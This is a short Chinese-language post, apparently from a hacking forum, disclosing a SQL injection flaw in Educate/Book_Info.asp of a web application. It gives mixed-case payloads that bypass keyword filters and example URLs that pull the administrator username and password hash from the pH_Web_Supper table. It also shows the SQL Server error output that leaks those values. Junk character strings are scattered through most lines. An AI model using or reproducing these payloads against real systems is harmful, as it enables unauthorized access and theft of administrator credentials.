漏洞出现在Educate/Book_Info.asp ; F# g: D# S3 b; B8 i
1 N% j! C$ Q1 q' K
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
2 }4 A4 d+ Y' S/ v" H; f N
7 h6 |7 M7 o9 ~2 b9 r+ jexp:如下& p$ q) i1 ~) U! a) G" t# w; j |
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& ?6 U: K# y3 R" Z查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 _' S7 I* F J5 p
0 l9 v" }+ D6 D- j# M
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper), {& M+ V$ z6 v$ Q0 p$ Y1 k! v0 e
! p: A) I9 z5 t1 U* J& M0 m1 _
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'. e4 M: |% a' c3 g
, A1 j5 L( n: v) ^ J8 h将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。* b: F" Z( N% ^1 g( h# g
) Z' b5 ?0 N6 {: L& N/Educate/Book_Info.asp,行 8/ r5 s8 f: r6 ~, d3 v# j$ Z
( b2 e3 t3 Q9 M, O
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" q% Y% z* |* i T* }
( w6 ], k8 x( Y' e# _- r8 }Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
M2 U4 F- U7 R/ a p% c) L ( v- r4 c# x/ E! Q
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。4 M* q) v, T* h. F# F+ t
( l* J, x2 ~! S& }
/Educate/Book_Info.asp,行 8
$ |4 B. H" |. C7 D' w |